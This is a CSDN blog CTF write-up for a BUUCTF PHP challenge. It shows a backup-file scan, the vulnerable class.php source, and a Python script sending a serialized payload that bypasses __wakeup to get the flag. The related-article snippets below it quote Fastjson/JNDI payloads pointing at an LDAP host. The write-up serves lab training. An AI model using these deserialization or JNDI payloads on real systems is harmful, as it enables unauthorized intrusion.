2019极客挑战赛WEB部分PHP

最新推荐文章于 2023-11-10 22:00:13 发布
最新推荐文章于 2023-11-10 22:00:13 发布
阅读量328 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iczfy585/article/details/105924762
版权

题目链接:buuoj

扫描敏感文件

根据题目描述,应该网站是存在备份文件的,这里用dirsearch工具扫描一下可以发现备份文件是www.zip。(PS:BUUCTF对大量的请求会返回429错误码,建议调小一下扫描的线程数)。
python3 dirsearch.py -u http://03670227-0f65-49ec-ad73-1075e1f979fc.node3.buuoj.cn/ -e php -t 1 | grep -E "200"
在这里插入图片描述

分析源码

下载j解压后有多个文件,其中有一个flag.php文件,提交后不是正确的答案。重点看index.php和class.php这两个文件。index.php中关键的代码如下:

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
?>

首先包含了class.php文件,然后获得GET方式传递的参数,对数据进行了反序列化。

在看一下class.php文件

<?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

发现能得到flag的位置在变量销毁是调用destruct()函数。只有当Name类的对象的password属性值为100并且username属性值为admin时,才会输出flag。而在反序列化是会调用wakeup函数使得username属性值为guest。这里就需要绕过wakeup函数。绕过的方法是:改变构造好的序列化字符串属性的个数,使得和Name中属性个数不一致,这样就会绕过wakeup函数。同时要注意private类型的变量和protected类型的变量序列化后的特点:

\x00 + 类名 + \x00 + 变量名 -> 反序列化为private变量
\x00 + * + \x00 + 变量名 -> 反序列化为protected变量

pyload如下:

import requests
payload='O:4:"Name":3:{s:14:"\x00Name\x00username";s:5:"admin";s:14:"\x00Name\x00password";i:100;}'
url='http://03670227-0f65-49ec-ad73-1075e1f979fc.node3.buuoj.cn/?select='
r = requests.get(url+payload)
print(r.text)

在这里插入图片描述

总结

本题主要考查PHP反序列化漏洞,这里就是利用了构造属性个数与类的本身属性个数不同来实现绕过wakeup()函数。同时要注意private类型的变量序列化后的字符串的特征

iringzh
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web前端】PHP入门
进步青年
12-30 417
PHP入门前言:了解一些知识一、PHP简介二、动态网页三、PHP的原理四、PHP语法入门4.1PHP的输出4.2定义变量4.3 分支、循环4.4数组4.5 **md5编码**4.6 时间戳 前言:了解一些知识 软件架构 C/S(客户端->服务端) B/S(浏览器->服务端) 哪些技术可以开发网站?   php、jsp、asp、ruby、python、nodejs、c/c++等。 WAMP架构解读  windows + apache + mysql + php LAMP/LNM
php安全挑战赛,2020 第四届强网杯全国网络安全挑战赛Online Writeup
weixin_36487018的博客
03-12 359
前言近期的一个周末参加了强网杯线上赛,以下是web题解。web辅助类定义如下:user = $user;$this->pass = $pass;$this->admin = $admin;}public function get_admin(){return $this->admin;}}class topsolo{protected $name;public function ...
php挑战赛,三个白帽挑战赛第三期的简单思路(第一次接触php反序列化)
weixin_39627144的博客
03-28 81
又一期三个白帽来了,由于某些原因,就只讲讲大概的思路,就不讲那么详细啦。主要是第一次接触反序列化。感觉又学到了新姿势。哈哈一、界面没什么变化,还是注册用户,然后登陆。二、登陆之后出现选择控制面板的选项,一个是管理员的面板选项,另一个是普通会员的面板选项。很明显需要越权啦。三、根据tips直接用0x就能提权为管理员。四、进入管理员的界面,可以编辑文章,还有搜索选项,从代码来看,很明显有个注入五、准备...
buuctf刷题12(zip://包含& 取反+无参数rce & csrf & FFI扩展安全)
weixin_63231007的博客
02-19 1167
[极客挑战 2020] Roamphp 1、2、4 rceme、5、6 flagshop、7 & 鹏程杯-简单的php
[极客挑战 2020]Roamphp 1、2、4
shinygod的博客
04-05 1753
知识点:数组绕过加密 Roamphp1-Welcome <?php error_reporting(0); if ($_SERVER['REQUEST_METHOD'] !== 'POST') { header("HTTP/1.1 405 Method Not Allowed"); exit(); } else { if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){ show_source(__FILE
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
ApacheFlink极客挑战赛垃圾图片分类赛道冠军方案分享.pdf
01-09
在"Apache Flink极客挑战赛垃圾图片分类赛道冠军方案分享"中,参赛者利用Flink的高效处理能力来解决图像分类问题,特别是在智慧城市和互联网应用中,这种技术具有广泛的应用潜力。 1.1 Flink与Intel Analytics Zoo...
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?的库之 jQuery UI【】7、常?的库之 jQuery Mobile【】8、常用的库之...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
第三届 Apache Flink 极客挑战赛暨AAIG CUP——电商推荐“抱大腿”攻击识别亚军代码方案.zip
08-21
全国大学生电子设计竞赛(National Undergraduate Electronics Design Contest),试题,解决方案及源码。计划或参加电赛的同学可以用来学习提升和参考。程序均是实战案例,经过测试可直接运行。...
Web】无字母/数字/参RCE相关例题wp
最新发布
uuzeray的博客
11-10 784
话说14号还有一场小比赛嘞,恰逢周末,好好整理一下贴出几篇文章一起学习。
buu-day10
anwen12的博客
01-27 2162
0x01 [红明谷CTF 2021]JavaWeb /;/json绕过权限校验,然后漏洞探测 ["java.net.InetAddress","khl16k.dnslog.cn"] ["br.com.anteros.dbcp.AnterosDBCPConfig", {"healthCheckRegistry": "ldap://8.142.93.103:9090/test"}] ["ch.qos.logback.core.db.JNDIConnectionSource",{"jndiLocation"
Syclover-Web题解
臭nana的博客
11-20 8251
目录 1、打比赛前先撸一只猫! 2、你看见过我的菜刀么 3、BurpSuiiiiiit!!! 4、性感潇文清,在线算卦 5、Easysql 6、RCE me 7、李三的代码审计笔记第一页 8、服务端检测系统 9、Lovelysql 10、性感黄阿姨,在线聊天 11、李三的代码审计笔记第二页 12、Babysql 13、神秘的三叶草 14、Eval evil code ...
极客挑战2020wp
Atkx's Blog
11-29 1039
Crypto 二战情报员刘壮 简介:你能知道刘壮在说什么?得到的flag包裹上SYC{} .-…/.----/…-/–…/…/…-/…-/-./–./…–.-/…/…–.-/–…/.----/-.–/.---- 提示:刘壮早上起床打摩丝 提交flag,发现错误,转换成小写还是不对,查看了一下群里给的hint,成功提交 铠甲与萨满 简介:YEI{roafnagtmroafnagtm_hgtmhgtmhgtm} 提示:kaisa? 偏移量为6时,得到flag MISC 一“页”障目 作者:lingze 简
逆向萌新关于第十届极客挑战逆向部分做题的一些心得(一)(jiang'sfan)
Fer1g1的博客
10-26 593
逆向萌新关于第十届极客挑战逆向部分做题的一些心得(一)(jiang’sfan) 首先附上题目下载链接: 附件文件: https://share.weiyun.com/5lmZaMw,提取码:dl8e5l 备用链接:http://geek.sycsec.com:4444...
CTF-Web-[极客挑战 2019]RCE ME
归子莫的博客
05-04 3464
CTF-Web-[极客挑战 2019]RCE ME 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]RCE ME 打开题目的实例 思路 把代码拿过来 <?ph...
BUUCTF之[极客挑战 2019]PHP ------ PHP的序列化/反序列化
weixin_44632787的博客
07-27 425
BUUCTF之[极客挑战 2019]PHP ------ PHP的序列化/反序列化 提示我们有备份网站,最终在www.zip下找到这个备份文件。将它下载下来,可以得到index.php,class.php和flag.php。 首先是flag.php,这里面虽然有flag。但是这个flag是假的。 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 然后就是index.php,你打开它后会发现它是WEB界面的那个代码。 最后,想要拿到真正的flag。需要从cla
BUUCTF [极客挑战 2019]PHP 1
weixin_45642610的博客
01-14 5251
BUUCTF [极客挑战 2019]PHP 1-刷题日记 进去后是这样: 提示备份,用dirsearch或dirmap扫出来(怎么安装上网找,很多教程,实在不会可以问我(除了dirmap))。搜个大字典下载,自带的字典很少。 py3 dir.py -u http://3c25afd0-8c4a-4832-8e11-f182ffcccae4.node3.buuoj.cn/ -e * -w db/dir.txt -u+地址 -e选择语言 -w选择字典 要多试几次,有时扫不出来,真的坑。(御剑更坑!) 输
2021极客挑战web部分wp
bmth666的博客
11-26 5692
Dark 看到url:http://c6h35nlkeoew5vzcpsacsidbip2ezotsnj6sywn7znkdtrbsqkexa7yd.onion/ 发现后缀为.onion,为洋葱,下载后使用洋葱游览器访问 Welcome2021 查看源码发现 那么抓包使用WELCOME请求方式访问 访问f1111aaaggg9.php 得到flag babysql 简单的sql注入,直接使用sqlmap即可,也可以联合注入 1' union select 1,2,3,4# 发现注入点为1,2 直
buuctf web 极客挑战2019
08-24
对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值